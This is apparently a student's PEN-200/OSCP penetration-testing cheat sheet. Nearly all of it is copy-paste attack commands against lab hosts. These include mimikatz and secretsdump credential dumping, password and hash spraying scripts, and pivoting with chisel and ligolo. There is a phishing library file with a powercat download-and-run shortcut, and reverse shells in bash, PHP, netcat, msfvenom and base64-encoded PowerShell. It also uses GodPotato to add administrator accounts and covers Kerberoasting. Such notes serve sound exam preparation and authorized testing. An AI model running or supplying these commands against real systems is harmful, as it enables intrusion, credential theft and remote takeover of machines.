PEN-200 Cheat Sheet

Setting Up

Download Binaries

List of Binaries

GodPotato.exe
PrintSpoofer.exe
Powerview.ps1
Sharphound.ps1
fastscan.sh
netspray.sh
nethash.sh
chisel
chisel.exe
chisel_amd64
ligolo-ng
ligolo_agent_win.exe
linpeas.sh
winpeas.exe
mimikatz.exe
nc64-32.exe
powercat.ps1
pspy64
wolfwebshell.php

Stand Up Python Server

python -m http.server 8000

Stand up SMB Share

impacket-smbserver smbfolder . -smb2support -user mason -password mason

Stand up Chisel Server

chisel server --port 9999 --reverse

Stand up Webdav Server

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .

Enumerating Externally

Port Scan

Slow Scan

nmap -sC -sV -p- -oN external.output 192.168.245.0/24

Fast Scan

./fastscan.sh 192.168.223.123 name

Contents:

#!/bin/bash

echo "Running quick Nmap scan to detect open ports."
nmap -Pn -T4 --max-retries 0 -p- -oN $2.quick $1
echo " "

echo "Running deeper Nmap scan on detected open ports."
nmap -sV -A -p $(grep open $2.quick | grep -v Warning | sed 's/ open  //g'| awk -F '/' '{print $1}'|tr '\n' ',') -oN $2.full $1
echo " "

echo "See below for a quick reference list of open ports and detected banners."
grep open $2.full | grep -v Warning | sed 's/ open  //g'

Check for Public Exploits

searchsploit key words

Check FTP

FTP

ftp anonymous@192.168.245.249 14020

Filezilla

filezilla anonymous@192.168.245.249

Check SMB

smbclient -L 192.168.245.247

Download from SMB share with:

get file.txt

SMBMap

smbmap -H 192.168.123.123

Check Web Servers

Quick Scan

gobuster dir -u http://192.168.199.249 -w /usr/share/wordlists/dirb/big.txt -o MS01 -x php,aspx

Comprehensive Scan

gobuster dir -u http://192.168.199.249 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o MS01 -x php,aspx

Files Scan

gobuster dir -u http://192.168.199.249 -w /usr/share/wordlists/dirb/big.txt -o MS01 -x php,aspx

Follow Redirects and Ignore Bad Codes

gobuster dir -u http://192.168.223.156:8083/api/v1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o Frankfurt -r -k

Foothold on Windows

Land as New User

Check for privileges

whoami /priv

Looking for:

- SeImpersonatePrivilege
- SeBackupPrivilege
- SeAssignPrimaryToken
- SeLoadDriver
- SeDebug

Check for Interesting Files

Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.log,*.kdbx,*ini,*.ps1,*.exe,*.zip -File -Recurse -ErrorAction SilentlyContinue; ls C:\

List files in small directories:

tree /F

Check history files:

(Get-PSReadlineOption).HistorySavePath
cat FILE
ls DIRECTORY

Useful Windows Binaries

List of binaries:

winPEAS
mimikatz
GodPotato
SharpHound
PowerView
PrintSpoofer

Download binaries onto machine:

cd C:\Users\Public; iwr -uri http://192.168.49.124:8000/winPEASx64.exe -Outfile winPEAS.exe; iwr -uri http://192.168.49.124:8000/mimikatz.exe -Outfile mimikatz.exe; iwr -uri http://192.168.49.124:8000/GodPotato-NET4.exe -Outfile GodPotato.exe; iwr -uri http://192.168.49.124:8000/SharpHound.ps1 -Outfile SharpHound.ps1; iwr -uri http://192.168.49.124:8000/PowerView.ps1 -Outfile powerview.ps1; iwr -uri http://192.168.49.124:8000/PrintSpoofer64.exe -Outfile print.exe;

Run and Review winPEAS

.\winPEAS.exe

Run and Review Sharphound

If on a domain:

. .\SharpHound.ps1;Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\Public\ -OutputPrefix "WS26"; $pass = ConvertTo-SecureString 'mason' -AsPlainText -Force; $pass; $cred = New-Object System.Management.Automation.PSCredential('mason', $pass); $cred; New-PSDrive -Name mason -PSProvider FileSystem -Credential $cred -Root \\192.168.49.124\smbfolder;copy *BloodHound.zip \\192.168.49.124\smbfolder\

Achieved Windows Admin

Check for Interesting Files

Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.log,*.kdbx,*ini,*.ps1,*.exe,*.zip -File -Recurse -ErrorAction SilentlyContinue; ls C:\

List files in small directories:

tree /F

Run and Review winPEAS

.\winPEAS.exe

REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Check Mimikatz

Check password hashes

.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

Check Kerberos tickets

.\mimikatz "privilege::debug" "sekurlsa::tickets" exit

Dump hashes from SAM file on live machine

.\mimikatz "lsadump::sam /system:SYSTEM /sam:SAM" exit

Dump hashes from existing SAM and SYSTEM files

.\mimikatz "lsadump::sam /system:SYSTEM /sam:SAM" exit

Foothold on Linux

Landed as User

Run and Review linPEAS

wget http://192.168.49.104:8000/linpeas.sh; chmod +x linpeas.sh; ./linpeas.sh

Check env files, history files, Unknown SetUID files

Check Processes

wget http://192.168.45.234:8000/pspy64; chmod +x pspy64; ./pspy64

Achieved Admin

Run and Review linPEAS

wget http://192.168.45.234:8000/linpeas.sh; chmod +x linpeas.sh; ./linpeas.sh

Pivoting

Ligolo

https://medium.com/@Poiint/pivoting-with-ligolo-ng-0ca402abc3e9

sudo ip tuntap add user kali mode tun ligolo  
sudo ip link set ligolo up

./proxy -selfcert

Follow the instructions in article and compiling from scratch worked better than install via apt.

Windows:

iwr -uri http://192.168.45.234:8000/ligolo_agent_win.exe -Outfile agent.exe; .\agent.exe -connect 192.168.45.234:11601 --ignore-cert

session

sudo ip route add 10.10.162.0/24 dev ligolo

Insert any other command here, using the IP without proxychains

impacket-mssqlclient sql_svc:'Dolphin1'@10.10.162.148 -windows-auth

Add listener for python server

listener_add --addr 0.0.0.0:7777 --to 127.0.0.1:8000 --tcp

Add listener for reverse shell

listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:443 --tcp

Chisel

Windows Dynamic Port Forwarding

cd C:\Users\Public; iwr -uri http://192.168.49.104:8000/chisel.exe -Outfile chisel.exe; .\chisel.exe client 192.168.49.104:9999 R:socks

Linux Dynamic Port Forwarding

wget http://192.168.45.234:80/chisel_amd64; chmod +x chisel_amd64; ./chisel_amd64 client 192.168.45.234:9999 R:socks

SSH

May be necessary to upgrade certain types of shells before using SSH

python3 -c 'import pty; pty.spawn("/bin/bash")'

Remote Port Forwarding

Remote Port Forwarding (SSH from Kali to Pivot)

ssh web_svc@192.168.195.147 -D 9090 -R *:7777:localhost:7777 -R *:8888:localhost:8888

Remote Port Forwarding (SSH from Pivot to Kali, I believe)

ssh kali@192.168.49.104 -D 9090 -R *:6666:localhost:6666 -R *:8888:localhost:8888

Local Port Forwarding

Local SSH port forward (this runs from a victim machine receiving connections looping back or going farther)

ssh -N -L 0.0.0.0:7777:127.0.0.1:80

Download a file

Windows

Via SMB

Authenticated

$pass = ConvertTo-SecureString 'mason' -AsPlainText -Force; $pass; $cred = New-Object System.Management.Automation.PSCredential('mason', $pass); $cred; New-PSDrive -Name mason -PSProvider FileSystem -Credential $cred -Root \\192.168.45.234\smbfolder;copy File.txt \\192.168.45.234\smbfolder\

Unauthenticated

$pass = ConvertTo-SecureString 'mason' -AsPlainText -Force; $pass; $cred = New-Object System.Management.Automation.PSCredential('mason', $pass); $cred; New-PSDrive -Name mason -PSProvider FileSystem -Credential $cred -Root \\192.168.45.234\smbfolder;copy File.txt \\192.168.45.234\smbfolder\

Download via PowerShell

iwr -uri http://192.168.45.234:8000/file.txt -Outfile file.txt 

Via SCP

scp ./file.txt kali@192.168.45.234:/home/kali/exam1

Hashcat Cracking

KeePass

hashcat -m 13400 jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

NTLM

hashcat -m 1000 jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberos

Check the prefixes of the hash and see what matches:

hashcat -h | grep -i kerberos 

hashcat -m XXXX jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

MD5

hashcat -m 0 jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Unix

Check the prefixes of the hash and see what matches:

hashcat -h | grep -i unix 

hashcat -m XXXX jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Secretsdump

Use impacket-secretsdump on SAM

impacket-secretsdump -system SYSTEM -sam SAM local

Guess Credentials

Netexec User/Pass

Works with single string values or text file lists.

netexec smb 172.16.206.0/24 -u user -p password --continue-on-success

Protocols included:

SMB
SSH
RDP
WINRM
FTP
LDAP
WMI
VNC
MSSQL

Don't forget about local accounts vs domain accounts with --local-auth flag.

Netspray.sh User/Pass

Wrapper around Netexec commands:

./netspray.sh 192.168.234.234 user password

Contents:

#!/bin/bash

echo "Testing SMB Connections with Domain Credentials"
netexec smb $1 -u $2 -p $3
echo "Testing SMB Connections with Local Credentials"
netexec smb $1 -u $2 -p $3 --local-auth
echo "Testing SSH Connections"
netexec ssh $1 -u $2 -p $3
echo "Testing RDP Connections with Domain Credentials"
netexec rdp $1 -u $2 -p $3
echo "Testing RDP Connections with Local Credentials"
netexec rdp $1 -u $2 -p $3 --local-auth
echo "Testing WinRM Connections with Domain Credentials"
netexec winrm $1 -u $2 -p $3
echo "Testing WinRM Connections with Domain Credentials"
netexec winrm $1 -u $2 -p $3 --local-auth
echo "Testing LDAP Connections"
netexec ldap $1 -u $2 -p $3
echo "Testing FTP Connections"
netexec ftp $1 -u $2 -p $3
echo "Testing WMI Connections"
netexec wmi $1 -u $2 -p $3
echo "Testing VNC Connections"
netexec vnc $1 -u $2 -p $3
echo "Testing MSSQL Connections"
netexec mssql $1 -u $2 -p $3

Netexec Hashes

Works with single string values or text file lists.

netexec smb 172.16.206.0/24 -u user -H SFSDFSDFSDFDSFSDFSDFSDF --continue-on-success

Protocols included:

SMB
SSH
RDP
WINRM
FTP
LDAP
WMI
VNC
MSSQL

Don't forget about local accounts vs domain accounts with --local-auth flag.

NetHash.sh Hashes

Wrapper around Netexec commands:

./netspray.sh 192.168.234.234 user SDFSDFSDFSDFSDFDSF

Contents:

#!/bin/bash

echo "Testing SMB Connections with Domain Credentials"
netexec smb $1 -u $2 -H $3
echo "Testing SMB Connections with Local Credentials"
netexec smb $1 -u $2 -H $3 --local-auth
echo "Testing SSH Connections"
netexec ssh $1 -u $2 -H $3
echo "Testing RDP Connections with Domain Credentials"
netexec rdp $1 -u $2 -H $3
echo "Testing RDP Connections with Local Credentials"
netexec rdp $1 -u $2 -H $3 --local-auth
echo "Testing WinRM Connections with Domain Credentials"
netexec winrm $1 -u $2 -H $3
echo "Testing WinRM Connections with Domain Credentials"
netexec winrm $1 -u $2 -H $3 --local-auth
echo "Testing LDAP Connections"
netexec ldap $1 -u $2 -H $3
echo "Testing FTP Connections"
netexec ftp $1 -u $2 -H $3
echo "Testing WMI Connections"
netexec wmi $1 -u $2 -H $3
echo "Testing VNC Connections"
netexec vnc $1 -u $2 -H $3
echo "Testing MSSQL Connections"
netexec mssql $1 -u $2 -H $3

Use Credentials

WinRM

User/Pass

evil-winrm -i 172.16.206.247 -u user -p "password"

Hashes

evil-winrm -i 172.16.206.247 -u user -H 2892D26CDF84D7A70E2EB3B9F05C4266

Upload or download

upload /home/kali/oscpa/winPEASx64.exe .

PsExec

User/Pass

impacket-psexec domain.com/user:'password'@172.16.111.254 

Hashes

impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb0787704666 user@172.16.6.240

SMBExec

User/Pass

impacket-smbexec domain.com/user:'password'@172.16.111.254 

Hashes

impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 user@172.16.6.240

WmiExec

User/Pass

impacket-wmiexec domain.com/user:'password'@172.16.111.254 

Hashes

impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C4266 user@192.168.50.73

Possible Phishing

Create Library file:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.45.234</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Create Shortcut file

powershell -nop -c "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.176:8000/powercat.ps1');powercat -c 192.168.45.176 -p 443 -e powershell"

Send email:

sudo swaks -t jim@domain.com --from maildmz@domain.com --attach @config.Library-ms --server 192.168.196.189 --body @body.txt --header "Subject: Something Broke" --suppress-data -ap

Web Shell Payloads

Download webshell

wget http://192.168.45.234:8000/wolfwebshell.php

Reverse Shell Payloads

Use revshells.com first and foremost.

Windows

PowerShell Encoded

Encode the payload first:

$Text = '$client = New-Object System.Net.Sockets.TCPClient("10.10.162.147",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

Use the payload:

powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA0ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

PowerShell Unencoded

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.234',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

PowerShell with PowerCat

powershell -nop -c "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.234:8000/powercat.ps1');powercat -c 192.168.45.234 -p 443 -e powershell"

Binary with MFSVenom

Create Binary

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe -o reverse.exe

Search for payloads

msfvenom -l payloads --platform linux --arch x64

Linux

Bash

/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.234/443 0>&1'

Busybox

/bin/busybox nc 192.168.45.160 80 -e /bin/bash

PHP

/usr/bin/php -r '$sock=fsockopen("192.168.45.234",443);exec("/bin/sh -i <&3 >&3 2>&3");'

Reviewing Git Data

After navigating to repository, you can check status:

git status

Check the logs:

git log

Copy a commit from the git log, to see the difference:

git show 8b430c17c16e6c0515e49c4eafdd129f719fde66

AS-REP Roasting

Need working AD credentials first. Helps to check Bloodhound for possible targets.

Use impacket to AS-REP roast user:

proxychains -q impacket-GetNPUsers -dc-ip 172.16.156.6 -request -outputfile michelle-asrep.hash domain.com/user

Kerberoasting

Need working AD credentials first. Helps to check Bloodhound for possible targets.

Use impacket to Kerberoast user:

proxychains -q impacket-GetUserSPNs -request -dc-ip 10.10.162.146 oscp.exam/user

Windows Service Binary Injection

Watch for a recurring process for the service:

while (1) {get-process scheduler -ErrorAction SilentlyContinue; sleep 0.1}

View all services on the machine:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName 

Replace service binary with reverse shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe -o reverse.exe

Stop, Start, or Restart services in Powershell:

Stop-Service scheduler

DLL Hijacking

Move service binary to a windows machine and use ProcMon to review the DLLs being called.

Once identified, replace vulnerable DLL with reverse shell and restart service binary.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=443 -f dll -o Custom.dll

Custom compilation may be necessary, review course.

SeImpersonate Privileges

Using GodPotato

Basic command syntax

.\GodPotato -cmd "cmd /c whoami"

Using a reverse shell:

iwr -uri http://192.168.45.234:8000/nc64-32.exe -Outfile nc.exe; .\GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.45.234 8443"

Add user to an admin group:

.\GodPotato -cmd "cmd /c net localgroup administrators adrian /add"

Change user's password:

.\GodPotato -cmd "cmd /c net user damon mason"

May need this info for RDP group adding:

.\GodPotato -cmd "cmd /creg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

.\GodPotato -cmd 'cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'

Add user and add them to admin group:

.\GodPotato -cmd "cmd /c net user mason mason /add"
.\GodPotato -cmd "cmd /c net localgroup administrators mason /add"

PrintSpoofer

.\print.exe -i -c powershell.exe

.\print.exe -c whoami

Databases

MySQL/MariaDB

Login:

sudo mysql -u root

mysql -u user -p7NVLVTDGJ38HM2GG -h 127.0.0.1

Dump the database:

.\mysqldump.exe -u root --all-databases -r db_backup.sql

Commands in the database:

create database hello

use hello;

source file.sql

show databases;
use froxlor;
show tables;
show columns from customers from oscdb;
select customers_password from customers;

SNMP

Look for interesting things with SNMPWalk

snmpwalk -v 2c -c public 192.168.208.149 NET-SNMP-EXTEND-MIB::nsExtendObjects

SharpGPOAbuse

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount charlotte --GPOName "Default Domain Policy" --force